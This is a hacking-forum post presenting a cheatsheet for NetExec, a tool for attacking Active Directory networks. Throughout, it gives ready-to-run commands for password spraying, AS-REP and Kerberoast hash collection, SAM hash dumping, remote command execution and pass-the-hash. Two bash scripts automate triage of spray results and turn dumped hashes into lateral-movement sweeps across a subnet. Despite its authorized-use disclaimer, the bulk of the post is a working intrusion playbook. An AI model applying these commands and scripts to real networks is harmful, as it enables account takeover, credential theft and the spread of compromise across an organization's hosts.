
Cracking 🔓 Netexec - SMB/WinRM/SSH Enumeration & Exploitation Toolkit (CrackMapExec Successor) - Cheatsheet, Tips and Cracking Techniques

dEEpEst
🔓 Netexec - SMB/WinRM/SSH Enumeration & Exploitation Toolkit (CrackMapExec Successor)


🚀 This post was created for the Hack Tools Dark Community.


NetExec (command name `nxc`, also installed as `netexec`) is a network enumeration and post-exploitation tool for Active Directory environments, written for red team and pentest use.
It is the maintained successor of CrackMapExec and improves on it in functionality, speed, and modularity. Below is a practical guide with examples and advanced usage.

Disclaimer: This content is for educational purposes only and must be used exclusively in authorized environments.
Neither the author nor the HTDark community is responsible for any misuse.



What is Netexec?
NetExec is the community fork that took over from CrackMapExec after its development stopped; it keeps the same command-line style, so existing CME habits carry over.
It is a Swiss army knife for AD reconnaissance and exploitation: credential testing, enumeration, command execution, file interaction, and more over SMB, WinRM, SSH, MSSQL, and LDAP, with Kerberos available as an authentication method on those protocols.

Installation
Bash:
pipx install git+https://github.com/Pennyw0rth/NetExec.git
# Or using pip:
pip install git+https://github.com/Pennyw0rth/NetExec.git
# Both put the nxc and netexec entry points on your PATH; the two names are interchangeable.

Protocols Supported
  • smb
  • winrm
  • ssh
  • mssql
  • ldap
  • Kerberos is not a separate protocol: it is an authentication option (-k / --kerberos) usable with the protocols above, and the roasting attacks run over ldap

Basic Syntax
Bash:
netexec <protocol> <target> -u <user> -p <pass>

Examples

Enumerate SMB shares and domain users (without --shares / --users the command only tests the login):
Bash:
netexec smb 192.168.1.10 -u user -p pass --shares --users

Execute a command over WinRM (-x for a cmd command, -X for a PowerShell command):
Bash:
netexec winrm 192.168.1.10 -u Administrator -p pass -x whoami

Check for local admin access across a subnet. Hosts where the account is an administrator are tagged (Pwn3d!) in the output; --local-auth means the account is a local one, so drop it when you hold domain credentials:
Bash:
netexec smb 192.168.1.0/24 -u user -p pass --local-auth

AS-REP roasting: collect the AS-REP hashes of accounts that have Kerberos pre-authentication disabled (queried over LDAP, no password needed, written to a file for offline cracking). This is not a brute force; the cracking happens offline:
Bash:
netexec ldap <DC-IP> -u usernames.txt -p '' --asreproast asrep.txt

Spray one password over SMB against a user list (-u accepts a file directly; --continue-on-success keeps going after the first hit so every valid account is found):
Bash:
netexec smb 192.168.1.0/24 -u users.txt -p "Summer2024" --continue-on-success
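A spray round is only as safe as what you do with its output before the next round. The following script is an added example (it is not code from the original post or from NetExec): it takes one round of nxc SMB spray output and separates valid credentials, hosts where the account is already local admin, and lockouts that mean the next password must not be tried yet. The sample output is constructed to mimic nxc's SMB line format; the hosts, users and the domain corp.local are made up.

```bash
#!/usr/bin/env bash
# Added example, not part of the original post or of NetExec itself:
# triage one nxc password-spray round before launching the next one.
# SPRAY_OUTPUT is constructed to look like nxc SMB output; every host,
# user and the domain corp.local is invented for the example.

# Constructed output of:
#   netexec smb 10.0.0.0/24 -u users.txt -p 'Welcome123' --continue-on-success
SPRAY_OUTPUT='SMB  10.0.0.15  445  FS01  [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  10.0.0.15  445  FS01  [+] corp.local\jdoe:Welcome123 (Pwn3d!)
SMB  10.0.0.15  445  FS01  [-] corp.local\asmith:Welcome123 STATUS_LOGON_FAILURE
SMB  10.0.0.15  445  FS01  [-] corp.local\svc_backup:Welcome123 STATUS_ACCOUNT_LOCKED_OUT
SMB  10.0.0.20  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.0.0.20  445  DC01  [+] corp.local\jdoe:Welcome123
SMB  10.0.0.20  445  DC01  [+] corp.local\mjones:Welcome123'

# Unique "DOMAIN\user:password" pairs that authenticated ([+] lines).
# Field 5 of an nxc line is the status marker, field 6 the credential.
valid_creds() {
  printf '%s\n' "$1" | awk '$5 == "[+]" { print $6 }' | sort -u
}

# Hosts where a sprayed account is local admin: nxc appends "(Pwn3d!)".
admin_hosts() {
  printf '%s\n' "$1" | awk '$5 == "[+]" && $NF == "(Pwn3d!)" { print $2 }' | sort -u
}

# Number of accounts the DC reported as locked out during this round.
lockouts() {
  printf '%s\n' "$1" | awk '/STATUS_ACCOUNT_LOCKED_OUT/ { n++ } END { print n + 0 }'
}

# Exit 0 only when the round produced no lockouts, i.e. it is safe to
# try the next password against the same user list.
safe_to_continue() {
  [ "$(lockouts "$1")" -eq 0 ]
}

# Summary as the operator reads it between rounds.
if safe_to_continue "$SPRAY_OUTPUT"; then
  echo "no lockouts; valid credentials:"
else
  echo "STOP: $(lockouts "$SPRAY_OUTPUT") account(s) locked out; re-check the policy with --pass-pol before spraying again"
fi
valid_creds "$SPRAY_OUTPUT"
echo "local admin on:"
admin_hosts "$SPRAY_OUTPUT"
```

Run it on real output by replacing the constructed SPRAY_OUTPUT with the captured stdout of the spray (for example `"$(netexec smb ... | tee spray.log)"`). A single locked-out account is the signal that the sprayed list contains accounts already near the lockout threshold, so the remedy is to wait out the observation window, not to keep going with the next password.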

Useful Options
  • -u / -p = username/password; both also accept a file with one entry per line
  • -H <nthash> = authenticate with an NT hash instead of a password (pass-the-hash)
  • --local-auth = authenticate as a local account instead of a domain account
  • --shares = enumerate accessible shares and the permissions you have on them
  • --sessions = list active sessions
  • --users = enumerate domain users
  • --pass-pol = dump the password and lockout policy (check this before spraying)
  • --sam = dump the local SAM hashes (needs local admin)
  • -x <cmd> / -X <powershell> = run a remote command (SMB, WinRM, SSH, MSSQL)
  • -k / --kerberos = use Kerberos authentication; add --use-kcache to use the ticket in KRB5CCNAME
  • --asreproast <file> / --kerberoast <file> (ldap) = collect AS-REP hashes of accounts without pre-auth, or TGS tickets of accounts with an SPN, for offline cracking

Tips & Tricks
  • Spray carefully: read the lockout threshold and observation window with --pass-pol first, spray one password per round against the whole user list, and stop at the first STATUS_ACCOUNT_LOCKED_OUT
  • Chain with Impacket tools: reuse hashes and tickets obtained with NetExec in `secretsdump`, `psexec`, etc.
  • Crack roast output with Hashcat: the files NetExec writes are already in hashcat format; AS-REP hashes ($krb5asrep$23$...) are `-m 18200`, Kerberoast TGS hashes ($krb5tgs$23$...) are `-m 13100`
  • Use the built-in database: hosts, credentials and shares from every run are stored and can be queried with `nxcdb`
  • Proxy support: run NetExec through `proxychains` over a SOCKS proxy when pivoting

Real-World Workflow
Bash:
# 1. Password spray
netexec smb 10.0.0.0/24 -u users.txt -p "Welcome123" --continue-on-success

# 2. Enumerate shares and sessions
netexec smb 10.0.0.15 -u user -p pass --shares --sessions

# 3. Dump the local SAM hashes (needs local admin, i.e. a (Pwn3d!) host)
netexec smb 10.0.0.15 -u user -p pass --sam

# 4. Execute a command via WinRM
netexec winrm 10.0.0.15 -u Administrator -p pass -x whoami
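The SAM dump in step 3 is usually the bridge to the rest of the subnet: local administrator passwords are often reused across workstations, and NetExec accepts the NT hash directly with -H. The script below is an added example (not code from the original post or from NetExec) that turns nxc --sam output into pass-the-hash sweeps, skipping the empty-password hash and flagging hashes shared by several local accounts. SAM_OUTPUT is constructed to mimic the tool's output; the host, the accounts and the NT hashes (the well-known values for "password" and for the empty password) are made up.

```bash
#!/usr/bin/env bash
# Added example, not part of the original post or of NetExec itself:
# turn the SAM dump from step 3 into pass-the-hash input for step 1 again.
# SAM_OUTPUT is constructed to look like nxc "--sam" output; host, users
# and hashes are invented (8846f7... is NT("password"), 31d6cf... is NT("")).

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password

SAM_OUTPUT='SMB  10.0.0.15  445  FS01  [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  10.0.0.15  445  FS01  [+] corp.local\jdoe:Welcome123 (Pwn3d!)
SMB  10.0.0.15  445  FS01  [+] Dumping SAM hashes
SMB  10.0.0.15  445  FS01  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB  10.0.0.15  445  FS01  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  10.0.0.15  445  FS01  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  10.0.0.15  445  FS01  localadmin:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB  10.0.0.15  445  FS01  [+] Added 4 SAM hashes to the database'

# "user:nthash" for every pwdump record (user:rid:lmhash:nthash:::) whose NT
# hash is not the empty-password hash. Field 5 of an nxc line holds the record;
# banner and status lines have no such record and are skipped by the checks.
sam_hashes() {
  printf '%s\n' "$1" | awk -v empty="$EMPTY_NT" '
    { n = split($5, p, ":") }
    n >= 4 && p[2] ~ /^[0-9]+$/ && length(p[3]) == 32 && length(p[4]) == 32 && p[4] != empty {
      print p[1] ":" p[4]
    }'
}

# NT hashes shared by more than one local account. Administrator and another
# account carrying the same hash means one password to try on every host.
reused_hashes() {
  sam_hashes "$1" | awk -F: '{ c[$2]++ } END { for (h in c) if (c[h] > 1) print h, c[h] }'
}

# One pass-the-hash sweep per dumped account against the given range.
# --local-auth because SAM accounts are local; every host that comes back
# "(Pwn3d!)" reused that local password.
pth_commands() {
  subnet=$1
  sam_hashes "$2" | while IFS=: read -r user nthash; do
    printf 'netexec smb %s -u %s -H %s --local-auth\n' "$subnet" "$user" "$nthash"
  done
}

echo "usable NT hashes:";  sam_hashes "$SAM_OUTPUT"
echo "reused hashes:";     reused_hashes "$SAM_OUTPUT"
echo "next sweep:";        pth_commands 10.0.0.0/24 "$SAM_OUTPUT"
```

Feed it the real dump with `SAM_OUTPUT="$(netexec smb 10.0.0.15 -u user -p pass --sam)"`. The empty hash is dropped because it normally belongs to disabled built-ins (Guest, DefaultAccount) and only produces noise in the logs; the reuse check is the quick way to decide which hash deserves the first sweep.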

Resources & Links

GitHub: https://github.com/Pennyw0rth/NetExec

💬 Have you already replaced CrackMapExec with Netexec?
Which modules or tricks work best in your red team engagements?

Drop your insights and join the discussion!
 